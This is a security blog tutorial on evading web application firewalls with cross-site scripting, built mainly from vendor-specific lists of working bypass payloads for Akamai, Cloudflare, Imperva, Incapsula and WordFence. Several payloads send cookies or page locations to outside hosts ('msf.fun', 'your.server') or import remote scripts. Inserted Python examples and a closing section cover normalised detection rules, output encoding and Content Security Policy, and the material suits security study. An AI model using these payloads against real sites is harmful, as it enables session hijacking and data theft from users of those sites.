Hey Folks 🙂 !! In this tutorial, we will describe some of the techniques commonly used by hackers to bypass Web Application Firewalls (WAF) during XSS exploitation.
Let’s See 🙂 !!
Introduction
Web Application Firewalls (WAFs) are essential security components designed to protect web applications from various types of attacks, including Cross-Site Scripting (XSS). However, sophisticated attackers often find ways to bypass WAFs, especially when it comes to injecting malicious XSS payloads. In this article, we’ll explore some techniques used to bypass WAFs and execute XSS payloads successfully.
Understanding XSS and WAFs
Cross-Site Scripting (XSS) is a type of injection attack where an attacker injects malicious scripts into content that is then served to users. These scripts can steal user data, hijack sessions, or perform unauthorized actions on behalf of the user.
WAFs are designed to filter and monitor HTTP requests, blocking any malicious attempts based on predefined rules or learning algorithms. However, WAFs are not foolproof, and attackers constantly develop new methods to evade them.
Common WAF Bypass Techniques
- Obfuscation: Attackers often obfuscate their XSS payloads to bypass WAF detection. Techniques like encoding the payload in different formats (e.g., HTML entities, Base64) or breaking up the script with comments or unnecessary characters can trick the WAF into allowing the payload through.
<img src=x onerror="/*<![CDATA[*/alert(1)/*]]>*/">
- Using Alternate Event Handlers: WAFs may specifically filter common event handlers like onload or onerror. Attackers can use less common event handlers that may not be included in the WAF’s rule set.
<div style="width:expression(alert(1))"></div>
- Polyglot Payloads: A polyglot XSS payload is one that can be interpreted in multiple contexts, increasing its chances of bypassing a WAF. These payloads are designed to execute regardless of whether they are processed as HTML, JavaScript, or another scripting language.
<script>/*</script><svg onload=alert(1)>*/
- Payload Splitting: Splitting the payload into multiple parts can sometimes evade detection, as WAFs may not correctly reassemble the script in its entirety.
<img src='1' onerror='ja'+'vascript:alert(1)'>
- Manipulating Headers: Some WAFs inspect specific HTTP headers for malicious content. By manipulating or injecting headers in a non-standard way, an attacker might bypass the WAF’s inspection process.
GET / HTTP/1.1
Host: victim.com
Content-Length: 0
X-Forwarded-For: '><script>alert(1)</script>
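The five techniques above share one root cause: a rule that matches the raw request string sees a different byte sequence from the one the browser eventually parses. As an added, defender-side example that is not code from the original post, the following Python sketch contrasts a narrow raw-input signature with rules applied after normalisation (repeated URL and entity decoding, comment stripping, whitespace folding). The sample inputs are constructed for this example from payload shapes shown on this page; the rule set and function names are illustrative and do not describe any particular WAF product.

```python
import html
import re
from urllib.parse import unquote

# Constructed test inputs. The first four reuse payload shapes shown in the
# article; the last two are benign strings a rule set must not block.
SAMPLES = {
    "details_toggle": "<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>",
    "tab_split_uri": '<a href="j\ta\tv\tasc\nri\tpt:(a\tl\te\tr\tt\t(document.domain))">X</a>',
    "encoded_object": "%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E",
    "plain_script": "<script>alert(1)</script>",
    "benign_markup": "Report on loading the data, 3 < 4 <b>bold</b>",
    "benign_encoded": "price%3C100%20%26%20on%20sale",
}

# A narrow signature run against the raw input: the kind of rule the
# article says alternate handlers, encoding and splitting walk past.
NAIVE_RULE = re.compile(r"<script|onload\s*=|onerror\s*=|javascript:", re.I)

# Rules applied only after normalisation. The event-handler rule matches ANY
# on* attribute inside a tag instead of a fixed list of handler names.
EVENT_HANDLER = re.compile(r"<[a-z][^>]*\bon[a-z]+\s*=")
RISKY_TAG = re.compile(r"<(script|object|iframe|embed)\b")
JS_URI = re.compile(r"javascript\s*:")
DATA_HTML = re.compile(r"data:text/html")


def decode_layers(value: str, rounds: int = 3) -> str:
    """Peel URL encoding and HTML entities until the value stops changing."""
    for _ in range(rounds):
        before = value
        value = html.unescape(unquote(value))  # %26%23x28; -> &#x28; -> (
        if value == before:
            break
    return value


def canonicalize(value: str) -> str:
    """Normalise input into the form the rules are written against."""
    value = decode_layers(value).replace("\x00", "")
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)  # JS/CSS block comments
    value = re.sub(r"\s+", " ", value)  # tabs, CR, LF used between attributes
    return value.lower()


def matches_after_normalisation(raw: str) -> bool:
    """Apply the post-normalisation rules; True means the input would be blocked."""
    canon = canonicalize(raw)
    # Browsers drop tab/CR/LF inside a URL scheme, so that view is checked
    # separately: one normalisation joins the characters, the other splits them.
    scheme_view = re.sub(r"[\t\n\r]", "", decode_layers(raw)).lower()
    return bool(
        EVENT_HANDLER.search(canon)
        or RISKY_TAG.search(canon)
        or DATA_HTML.search(canon)
        or JS_URI.search(scheme_view)
    )


def scan(samples: dict) -> dict:
    """Return {name: (naive_rule_hit, normalised_rule_hit)} for each sample."""
    return {
        name: (bool(NAIVE_RULE.search(raw)), matches_after_normalisation(raw))
        for name, raw in samples.items()
    }


if __name__ == "__main__":
    for name, (naive, normalised) in scan(SAMPLES).items():
        print(f"{name:16} naive={naive!s:5} normalised={normalised}")
```

Running it shows the naive signature missing the uncommon handler, the tab-split scheme and the URL-encoded object tag while the normalised rules catch all three and still pass both benign strings. Normalisation is never complete, though: this sketch does nothing about JavaScript string concatenation (`'ja'+'vascript'`), `\u00xx` escapes, `atob()` or `constructor.constructor`, all of which appear in the payload lists below, and repeated decoding can also produce false positives on data that is legitimately double-encoded. That gap is the practical reason for the article's closing advice not to rely on the WAF alone.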
Now let’s have a look at some WAF bypass payloads 🙂 !!
Akamai XSS Payloads
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert`1``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click -@niksthehacker
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert`1``;
https://twitter.com/xhzeem/status/1378316651431612422
https://twitter.com/xhzeem/status/1377992310974218245
<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click -@stealthybugs
Cloudflare XSS payloads
<a"/onclick=(confirm)()>Click Here!
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain) (working)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg onx=() onload=window.alert?.()> (working)
test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic
"onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic
"><svg%20onload=alert%26%230000000040"1")> (working)- @IamRenganathan
%27%09);%0d%0a%09%09[1].find(alert)//
"><img src=1 onmouseleave=print()> - @itsgeekymonk
<svg on onload=(alert)(document.domain)> -@zapstiko
<svg/on%20onload=alert(1)> (working) -@aufzayed
<img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi
Cloudfront XSS payloads
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
"><img src=x onerror=confirm(1);>
Imperva XSS payloads
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly)
tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded)
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads
<svg onload\r\n=$.globalEval("al"+"ert()");>
<bleh/onclick=top[/al/.source+/ert/.source]	``>click Pinaki @0xInfection
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"> -@AldenAous
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap
Incapsula XSS payloads
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<img/src=q onerror='new Function`al\ert`1``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert) or (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-tarun/)">XXXXX</a>
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'
WordFence XSS payloads
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<meter onmouseover="alert(1)" -@manjith27945363
'">><div><meter onmouseover="alert(1)"</div>" -@manjith27945363
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
Wordfence 7.4.2
<a href=javascript:alert(1)> -@brutelogic
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
Best Practices for Defenders
While understanding how attackers bypass WAFs is crucial, it’s equally important for defenders to continuously update WAF rules, employ multiple layers of security, and conduct regular security assessments.
- Regular Updates: Keep WAF signatures and rules up-to-date to cover new and emerging threats.
- Defense-in-Depth: Utilize a combination of security mechanisms (e.g., input validation, Content Security Policy) alongside the WAF for better protection.
- Security Testing: Regularly perform penetration testing and security assessments to identify and patch any vulnerabilities that could be exploited.
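The defense-in-depth bullet is easiest to see in code. As an added example that is not part of the original article, this Python snippet encodes one untrusted value for three output contexts (element text, quoted attribute, JavaScript string literal) and emits a nonce-based Content-Security-Policy, so a payload that slips past the WAF still arrives at the browser as inert text. The attacker values are constructed from payload shapes listed earlier on this page; the page template, header values and function names are illustrative.

```python
import html
import json
import secrets

# Constructed attacker values, modelled on payload shapes listed in the article.
ATTACKER_VALUES = [
    '"><img src=x onerror=confirm(1);>',
    "<details/open/ontoggle=confirm('XSS')>",
    "</script><svg onload=alert(1)>",
    "javascript:alert(1)",
]

# Number of < and > characters in the fixed template of render_page below;
# a correctly encoded page keeps exactly this many regardless of input.
TEMPLATE_TAG_CHARS = 5


def encode_for_html(value: str) -> str:
    """Text between tags: escape & < > " and ' so no tag can start."""
    return html.escape(value, quote=True)


def encode_for_attribute(value: str) -> str:
    """Quoted attribute value: same escaping; the template MUST quote the attribute."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """JavaScript string literal inside <script>: JSON-encode, then neutralise
    the characters that could close the script block or open an HTML comment."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def csp_header(nonce: str) -> str:
    """Nonce-based policy: only scripts carrying this nonce (and those they load) run."""
    return (
        f"default-src 'self'; script-src 'nonce-{nonce}' 'strict-dynamic'; "
        "object-src 'none'; base-uri 'none'"
    )


def render_page(user_value: str, nonce: str = "") -> tuple:
    """Return (response headers, HTML body) for one untrusted value placed in
    an element, a quoted attribute and a script literal."""
    nonce = nonce or secrets.token_urlsafe(16)  # fresh per response in real code
    body = (
        f"<p>Last search: {encode_for_html(user_value)}</p>\n"
        f'<input name="q" value="{encode_for_attribute(user_value)}">\n'
        f'<script nonce="{nonce}">var lastQuery = {encode_for_js_string(user_value)};</script>'
    )
    return {"Content-Security-Policy": csp_header(nonce)}, body


def markup_is_inert(user_value: str) -> bool:
    """True when the input added no tag delimiters to the rendered page."""
    _, body = render_page(user_value, nonce="example-nonce")
    return (
        body.count("<") == TEMPLATE_TAG_CHARS
        and body.count(">") == TEMPLATE_TAG_CHARS
        and body.count("</script>") == 1
    )


if __name__ == "__main__":
    headers, body = render_page(ATTACKER_VALUES[0])
    print(headers["Content-Security-Policy"])
    print(body)
    print(all(markup_is_inert(v) for v in ATTACKER_VALUES))
```

Two layers are doing the work here. Output encoding keeps every attacker value inside the context it was placed in, which is why the tag count of the rendered page never changes. The CSP is the backstop: with a per-response nonce and `'strict-dynamic'`, an injected `<script>` or `onerror` handler that somehow reached the DOM carries no nonce and does not execute, and `object-src 'none'` covers the `data:text/html` `<object>` payloads in the Incapsula list above. Neither layer replaces the other, and neither replaces the WAF; together they are the "multiple layers" the bullet calls for.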
Conclusion
Bypassing a WAF with XSS payloads requires creativity and a deep understanding of both the WAF’s limitations and the web application itself. While WAFs provide a strong line of defense, they should not be solely relied upon. A layered security approach combined with continuous monitoring and testing is essential to defend against these sophisticated attacks.
Additionally 🙂 !! If you are a beginner and have some difficulty understanding XSS vulnerabilities in depth, you can visit here
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.